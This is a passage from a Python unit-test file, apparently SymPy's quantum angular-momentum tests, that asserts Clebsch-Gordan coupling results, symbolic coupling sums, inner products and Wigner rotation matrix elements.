JzKet(S.Half, S.Half),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(3)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== 2
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
) == JzKetCoupled(
Rational(5, 2),
Rational(-5, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
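# Symbolic coupling: with j and m left symbolic the Clebsch-Gordan coefficients
# cannot be evaluated, so couple() is expected to return an unevaluated Sum of
# CG coefficients times coupled kets, with the total j running from m1 + m2 up
# to j1 + j2 (see the first assert below).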
def test_couple_symbolic():
assert couple(TensorProduct(JzKet(j1, m1), JzKet(j2, m2))) == Sum(
CG(j1, m1, j2, m2, j, m1 + m2) * JzKetCoupled(j, m1 + m2, (j1, j2)),
(j, m1 + m2, j1 + j2),
)
assert couple(TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3))) == Sum(
CG(j1, m1, j2, m2, j12, m1 + m2)
* CG(j12, m1 + m2, j3, m3, j, m1 + m2 + m3)
* JzKetCoupled(j, m1 + m2 + m3, (j1, j2, j3), ((1, 2, j12), (1, 3, j))),
(j12, m1 + m2, j1 + j2),
(j, m1 + m2 + m3, j12 + j3),
)
assert couple(
TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3)), ((1, 3), (1, 2))
) == Sum(
CG(j1, m1, j3, m3, j13, m1 + m3)
* CG(j13, m1 + m3, j2, m2, j, m1 + m2 + m3)
* JzKetCoupled(j, m1 + m2 + m3, (j1, j2, j3), ((1, 3, j13), (1, 2, j))),
(j13, m1 + m3, j1 + j3),
(j, m1 + m2 + m3, j13 + j2),
)
assert couple(
TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4))
) == Sum(
CG(j1, m1, j2, m2, j12, m1 + m2)
* CG(j12, m1 + m2, j3, m3, j123, m1 + m2 + m3)
* CG(j123, m1 + m2 + m3, j4, m4, j, m1 + m2 + m3 + m4)
* JzKetCoupled(
j,
m1 + m2 + m3 + m4,
(j1, j2, j3, j4),
((1, 2, j12), (1, 3, j123), (1, 4, j)),
),
(j12, m1 + m2, j1 + j2),
(j123, m1 + m2 + m3, j12 + j3),
(j, m1 + m2 + m3 + m4, j123 + j4),
)
assert couple(
TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4)),
((1, 2), (3, 4), (1, 3)),
) == Sum(
CG(j1, m1, j2, m2, j12, m1 + m2)
* CG(j3, m3, j4, m4, j34, m3 + m4)
* CG(j12, m1 + m2, j34, m3 + m4, j, m1 + m2 + m3 + m4)
* JzKetCoupled(
j,
m1 + m2 + m3 + m4,
(j1, j2, j3, j4),
((1, 2, j12), (3, 4, j34), (1, 3, j)),
),
(j12, m1 + m2, j1 + j2),
(j34, m3 + m4, j3 + j4),
(j, m1 + m2 + m3 + m4, j12 + j34),
)
assert couple(
TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4)),
((1, 3), (1, 4), (1, 2)),
) == Sum(
CG(j1, m1, j3, m3, j13, m1 + m3)
* CG(j13, m1 + m3, j4, m4, j134, m1 + m3 + m4)
* CG(j134, m1 + m3 + m4, j2, m2, j, m1 + m2 + m3 + m4)
* JzKetCoupled(
j,
m1 + m2 + m3 + m4,
(j1, j2, j3, j4),
((1, 3, j13), (1, 4, j134), (1, 2, j)),
),
(j13, m1 + m3, j1 + j3),
(j134, m1 + m3 + m4, j13 + j4),
(j, m1 + m2 + m3 + m4, j134 + j2),
)
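# Inner products of Jz eigenstates check orthonormality (<j m|j m> = 1,
# <j m|j m'> = 0 for m != m'); mixed-basis brackets such as <JxBra|JzKet>
# reduce to definite values once both states are expressed in a common basis.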
def test_innerproduct():
assert InnerProduct(JzBra(1, 1), JzKet(1, 1)).doit() == 1
assert (
InnerProduct(JzBra(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))).doit() == 0
)
assert InnerProduct(JzBra(j, m), JzKet(j, m)).doit() == 1
assert InnerProduct(JzBra(1, 0), JyKet(1, 1)).doit() == I / sqrt(2)
assert (
InnerProduct(JxBra(S.Half, S.Half), JzKet(S.Half, S.Half)).doit()
== -sqrt(2) / 2
)
assert InnerProduct(JyBra(1, 1), JzKet(1, 1)).doit() == S.Half
assert InnerProduct(JxBra(1, -1), JyKet(1, 1)).doit() == 0
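# Rotation.d(j, m, mp, beta) is the Wigner small-d matrix element, which in the
# convention used by these asserts is
#     d^j_{m, mp}(beta) = <j, m| exp(-I*beta*Jy/hbar) |j, mp>,
# e.g. d^{1/2}_{1/2, 1/2}(beta) = cos(beta/2).  The tests compare against the
# standard closed forms for j = 1/2, 1, 3/2 and 2, symbolically and at beta = pi/2.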
def test_rotation_small_d():
# Symbolic tests
# j = 1/2
assert Rotation.d(S.Half, S.Half, S.Half, beta).doit() == cos(beta / 2)
assert Rotation.d(S.Half, S.Half, Rational(-1, 2), beta).doit() == -sin(beta / 2)
assert Rotation.d(S.Half, Rational(-1, 2), S.Half, beta).doit() == sin(beta / 2)
assert Rotation.d(S.Half, Rational(-1, 2), Rational(-1, 2), beta).doit() == cos(
beta / 2
)
# j = 1
assert Rotation.d(1, 1, 1, beta).doit() == (1 + cos(beta)) / 2
assert Rotation.d(1, 1, 0, beta).doit() == -sin(beta) / sqrt(2)
assert Rotation.d(1, 1, -1, beta).doit() == (1 - cos(beta)) / 2
assert Rotation.d(1, 0, 1, beta).doit() == sin(beta) / sqrt(2)
assert Rotation.d(1, 0, 0, beta).doit() == cos(beta)
assert Rotation.d(1, 0, -1, beta).doit() == -sin(beta) / sqrt(2)
assert Rotation.d(1, -1, 1, beta).doit() == (1 - cos(beta)) / 2
assert Rotation.d(1, -1, 0, beta).doit() == sin(beta) / sqrt(2)
assert Rotation.d(1, -1, -1, beta).doit() == (1 + cos(beta)) / 2
# j = 3/2
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), Rational(3, 2), beta).doit()
== (3 * cos(beta / 2) + cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), S.Half, beta).doit()
== -sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), Rational(-1, 2), beta).doit()
== sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), Rational(-3, 2), beta).doit()
== (-3 * sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), S.Half, Rational(3, 2), beta).doit()
== sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), S.Half, S.Half, beta).doit()
== (cos(beta / 2) + 3 * cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), S.Half, Rational(-1, 2), beta).doit()
== (sin(beta / 2) - 3 * sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), S.Half, Rational(-3, 2), beta).doit()
== sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), Rational(3, 2), beta).doit()
== sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), S.Half, beta).doit()
== (-sin(beta / 2) + 3 * sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), Rational(-1, 2), beta).doit()
== (cos(beta / 2) + 3 * cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), Rational(-3, 2), beta).doit()
== -sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), Rational(3, 2), beta).doit()
== (3 * sin(beta / 2) - sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), S.Half, beta).doit()
== sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), Rational(-1, 2), beta).doit()
== sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), Rational(-3, 2), beta).doit()
== (3 * cos(beta / 2) + cos(beta * Rational(3, 2))) / 4
)
# j = 2
assert Rotation.d(2, 2, 2, beta).doit() == (3 + 4 * cos(beta) + cos(2 * beta)) / 8
assert Rotation.d(2, 2, 1, beta).doit() == -((cos(beta) + 1) * sin(beta)) / 2
assert Rotation.d(2, 2, 0, beta).doit() == sqrt(6) * sin(beta) ** 2 / 4
assert Rotation.d(2, 2, -1, beta).doit() == (cos(beta) - 1) * sin(beta) / 2
assert Rotation.d(2, 2, -2, beta).doit() == (3 - 4 * cos(beta) + cos(2 * beta)) / 8
assert Rotation.d(2, 1, 2, beta).doit() == (cos(beta) + 1) * sin(beta) / 2
assert Rotation.d(2, 1, 1, beta).doit() == (cos(beta) + cos(2 * beta)) / 2
assert Rotation.d(2, 1, 0, beta).doit() == -sqrt(6) * sin(2 * beta) / 4
assert Rotation.d(2, 1, -1, beta).doit() == (cos(beta) - cos(2 * beta)) / 2
assert Rotation.d(2, 1, -2, beta).doit() == (cos(beta) - 1) * sin(beta) / 2
assert Rotation.d(2, 0, 2, beta).doit() == sqrt(6) * sin(beta) ** 2 / 4
assert Rotation.d(2, 0, 1, beta).doit() == sqrt(6) * sin(2 * beta) / 4
assert Rotation.d(2, 0, 0, beta).doit() == (1 + 3 * cos(2 * beta)) / 4
assert Rotation.d(2, 0, -1, beta).doit() == -sqrt(6) * sin(2 * beta) / 4
assert Rotation.d(2, 0, -2, beta).doit() == sqrt(6) * sin(beta) ** 2 / 4
assert Rotation.d(2, -1, 2, beta).doit() == (2 * sin(beta) - sin(2 * beta)) / 4
assert Rotation.d(2, -1, 1, beta).doit() == (cos(beta) - cos(2 * beta)) / 2
assert Rotation.d(2, -1, 0, beta).doit() == sqrt(6) * sin(2 * beta) / 4
assert Rotation.d(2, -1, -1, beta).doit() == (cos(beta) + cos(2 * beta)) / 2
assert Rotation.d(2, -1, -2, beta).doit() == -((cos(beta) + 1) * sin(beta)) / 2
assert Rotation.d(2, -2, 2, beta).doit() == (3 - 4 * cos(beta) + cos(2 * beta)) / 8
assert Rotation.d(2, -2, 1, beta).doit() == (2 * sin(beta) - sin(2 * beta)) / 4
assert Rotation.d(2, -2, 0, beta).doit() == sqrt(6) * sin(beta) ** 2 / 4
assert Rotation.d(2, -2, -1, beta).doit() == (cos(beta) + 1) * sin(beta) / 2
assert Rotation.d(2, -2, -2, beta).doit() == (3 + 4 * cos(beta) + cos(2 * beta)) / 8
# Numerical tests
# j = 1/2
assert Rotation.d(S.Half, S.Half, S.Half, pi / 2).doit() == sqrt(2) / 2
assert Rotation.d(S.Half, S.Half, Rational(-1, 2), pi / 2).doit() == -sqrt(2) / 2
assert Rotation.d(S.Half, Rational(-1, 2), S.Half, pi / 2).doit() == sqrt(2) / 2
assert (
Rotation.d(S.Half, Rational(-1, 2), Rational(-1, 2), pi / 2).doit()
== sqrt(2) / 2
)
# j = 1
assert Rotation.d(1, 1, 1, pi / 2).doit() == S.Half
assert Rotation.d(1, 1, 0, pi / 2).doit() == -sqrt(2) / 2
assert Rotation.d(1, 1, -1, pi / 2).doit() == S.Half
assert Rotation.d(1, 0, 1, pi / 2).doit() == sqrt(2) / 2
assert Rotation.d(1, 0, 0, pi / 2).doit() == 0
assert Rotation.d(1, 0, -1, pi / 2).doit() == -sqrt(2) / 2
assert Rotation.d(1, -1, 1, pi / 2).doit() == S.Half
assert Rotation.d(1, -1, 0, pi / 2).doit() == sqrt(2) / 2
assert Rotation.d(1, -1, -1, pi / 2).doit() == S.Half
# j = 3/2
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), Rational(3, 2), pi / 2).doit()
== sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), S.Half, pi / 2).doit()
== -sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), Rational(-1, 2), pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(3, 2), Rational(-3, 2), pi / 2).doit()
== -sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), S.Half, Rational(3, 2), pi / 2).doit() == sqrt(6) / 4
)
assert Rotation.d(Rational(3, 2), S.Half, S.Half, pi / 2).doit() == -sqrt(2) / 4
assert (
Rotation.d(Rational(3, 2), S.Half, Rational(-1, 2), pi / 2).doit()
== -sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), S.Half, Rational(-3, 2), pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), Rational(3, 2), pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), S.Half, pi / 2).doit()
== sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), Rational(-1, 2), pi / 2).doit()
== -sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-1, 2), Rational(-3, 2), pi / 2).doit()
== -sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), Rational(3, 2), pi / 2).doit()
== sqrt(2) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), S.Half, pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), Rational(-1, 2), pi / 2).doit()
== sqrt(6) / 4
)
assert (
Rotation.d(Rational(3, 2), Rational(-3, 2), Rational(-3, 2), pi / 2).doit()
== sqrt(2) / 4
)
# j = 2
assert Rotation.d(2, 2, 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.d(2, 2, 1, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 2, 0, pi / 2).doit() == sqrt(6) / 4
assert Rotation.d(2, 2, -1, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 2, -2, pi / 2).doit() == Rational(1, 4)
assert Rotation.d(2, 1, 2, pi / 2).doit() == S.Half
assert Rotation.d(2, 1, 1, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 1, 0, pi / 2).doit() == 0
assert Rotation.d(2, 1, -1, pi / 2).doit() == S.Half
assert Rotation.d(2, 1, -2, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 0, 2, pi / 2).doit() == sqrt(6) / 4
assert Rotation.d(2, 0, 1, pi / 2).doit() == 0
assert Rotation.d(2, 0, 0, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, 0, -1, pi / 2).doit() == 0
assert Rotation.d(2, 0, -2, pi / 2).doit() == sqrt(6) / 4
assert Rotation.d(2, -1, 2, pi / 2).doit() == S.Half
assert Rotation.d(2, -1, 1, pi / 2).doit() == S.Half
assert Rotation.d(2, -1, 0, pi / 2).doit() == 0
assert Rotation.d(2, -1, -1, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, -1, -2, pi / 2).doit() == Rational(-1, 2)
assert Rotation.d(2, -2, 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.d(2, -2, 1, pi / 2).doit() == S.Half
assert Rotation.d(2, -2, 0, pi / 2).doit() == sqrt(6) / 4
assert Rotation.d(2, -2, -1, pi / 2).doit() == S.Half
assert Rotation.d(2, -2, -2, pi / 2).doit() == Rational(1, 4)
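# Rotation.D is the full Wigner D-function; consistent with the asserts below,
#     D^j_{m, mp}(alpha, beta, gamma) = exp(-I*m*alpha) * d^j_{m, mp}(beta) * exp(-I*mp*gamma),
# i.e. the small-d element dressed with the two Euler-angle phase factors.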
def test_rotation_d():
# Symbolic tests
# j = 1/2
assert Rotation.D(S.Half, S.Half, S.Half, alpha, beta, gamma).doit() == cos(
beta / 2
) * exp(-I * alpha / 2) * exp(-I * gamma / 2)
assert Rotation.D(
S.Half, S.Half, Rational(-1, 2), alpha, beta, gamma
).doit() == -sin(beta / 2) * exp(-I * alpha / 2) * exp(I * gamma / 2)
assert Rotation.D(
S.Half, Rational(-1, 2), S.Half, alpha, beta, gamma
).doit() == sin(beta / 2) * exp(I * alpha / 2) * exp(-I * gamma / 2)
assert Rotation.D(
S.Half, Rational(-1, 2), Rational(-1, 2), alpha, beta, gamma
).doit() == cos(beta / 2) * exp(I * alpha / 2) * exp(I * gamma / 2)
# j = 1
assert Rotation.D(1, 1, 1, alpha, beta, gamma).doit() == (1 + cos(beta)) / 2 * exp(
-I * alpha
) * exp(-I * gamma)
assert Rotation.D(1, 1, 0, alpha, beta, gamma).doit() == -sin(beta) / sqrt(2) * exp(
-I * alpha
)
assert Rotation.D(1, 1, -1, alpha, beta, gamma).doit() == (1 - cos(beta)) / 2 * exp(
-I * alpha
) * exp(I * gamma)
assert Rotation.D(1, 0, 1, alpha, beta, gamma).doit() == sin(beta) / sqrt(2) * exp(
-I * gamma
)
assert Rotation.D(1, 0, 0, alpha, beta, gamma).doit() == cos(beta)
